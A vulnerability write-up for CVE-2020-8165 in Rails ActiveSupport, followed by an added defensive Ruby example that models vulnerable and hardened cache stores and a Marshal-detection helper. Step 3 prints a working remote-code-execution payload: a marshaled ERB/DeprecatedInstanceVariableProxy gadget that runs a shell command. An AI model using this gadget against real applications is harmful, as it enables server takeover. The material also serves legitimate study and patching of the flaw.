
CVE-2020-8165

A flaw was found in rubygem-activesupport. Untrusted user input can be written to the cache store using the raw: true parameter, which can lead to the stored value being evaluated as a marshaled object instead of plain text when it is read back. The threat from this vulnerability is to data confidentiality and integrity as well as system availability.

  1. Create the Gemfile
    source 'https://rubygems.org'
    git_source(:github) { |repo| "https://github.com/#{repo}.git" }
    ruby '2.6.3'
    gem 'rails', '5.2.3'
    gem 'sqlite3'
    gem 'puma', '~> 3.11'
    gem 'redis', '~> 4.0'
    gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby]
    
  2. Install the gems and open a Rails console
    bundle install --path vendor/bundle
    bundle exec rails console
    
  3. Build the payload in the Rails console
    require 'uri'
    code = '`touch /tmp/rce`'
    erb = ERB.allocate
    erb.instance_variable_set :@src, code
    erb.instance_variable_set :@filename, "1"
    erb.instance_variable_set :@lineno, 1
    puts URI.encode_www_form(payload: Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result))
    
  4. Find the endpoint and inject the payload

The payload needs to be stored in the session to be deserialized by the session manager.
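To make the raw: true behaviour described above concrete from the defender's side, here is an added example (not code from the original page or from Rails itself) that models the read path in a minimal in-memory store: the vulnerable variant hands every stored byte string to Marshal.load and silently falls back to the plain string on failure, while the hardened variant records how each entry was written and never deserializes raw entries. Class and method names (VulnerableStore, HardenedStore, looks_like_marshal?) are assumptions chosen for illustration, and the "untrusted" bytes are a constructed, harmless Struct rather than a real gadget.

```ruby
# Added example modelling CVE-2020-8165; names are illustrative, not Rails' API.
MARSHAL_MAGIC = "\x04\x08".b.freeze   # header of a Ruby Marshal 4.8 stream

# Vulnerable pattern: a raw: true write stores the caller's string verbatim,
# and every read tries Marshal.load first, rescuing back to the plain string.
# Any client-controlled value that happens to be a Marshal stream therefore
# gets instantiated as an object on the next read.
class VulnerableStore
  def initialize; @data = {}; end

  def write(key, value, raw: false)
    @data[key] = raw ? value.to_s : Marshal.dump(value)
  end

  def read(key)
    bytes = @data[key] or return nil
    Marshal.load(bytes) rescue bytes
  end
end

# Hardened pattern: remember whether an entry was written raw; raw entries
# are returned as strings and are never passed to Marshal.load.
class HardenedStore
  def initialize; @data = {}; end

  def write(key, value, raw: false)
    @data[key] = raw ? [:raw, value.to_s] : [:marshal, Marshal.dump(value)]
  end

  def read(key)
    kind, bytes = @data[key]
    return nil unless kind
    kind == :raw ? bytes : Marshal.load(bytes)
  end
end

# Detection helper: flag client-supplied values that look like a Marshal
# stream before they reach a raw cache write (useful for logging/alerting).
def looks_like_marshal?(str)
  str.b.start_with?(MARSHAL_MAGIC)
end

# Constructed stand-in for attacker-controlled bytes: a marshaled, harmless
# Struct instance. A real attack would use a gadget chain instead.
Point = Struct.new(:x, :y)
def untrusted_input
  Marshal.dump(Point.new(1, 2))
end
```

Reading the same raw entry back from each store shows the difference: the vulnerable store returns a live Point object built from bytes it never should have deserialized, the hardened store returns the string unchanged.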